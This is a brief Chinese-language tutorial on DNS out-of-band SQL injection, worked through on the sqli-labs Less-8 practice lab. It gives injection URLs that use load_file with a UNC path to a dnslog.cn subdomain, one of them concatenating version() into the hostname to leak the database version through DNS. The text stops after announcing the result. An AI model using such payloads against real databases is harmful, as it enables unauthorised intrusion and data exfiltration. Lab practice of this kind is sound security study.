sql注入——dns的带外注入
以sql labs8为例
1.搜索dns.log在线软件,并get一个域名
2.在cmd中ping该域名,发现解析成功
3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行
4.在dnslog上刷新查询,就可以看到sss就可以请求到了
5.在语句中修改为http://localhost/sqli-labs-master/Less-8/?id=1' and load_file(concat("\\\\",version(),".cipv66.dnslog.cn\\xxx.txt") )-- -,即可查到版本信息如下: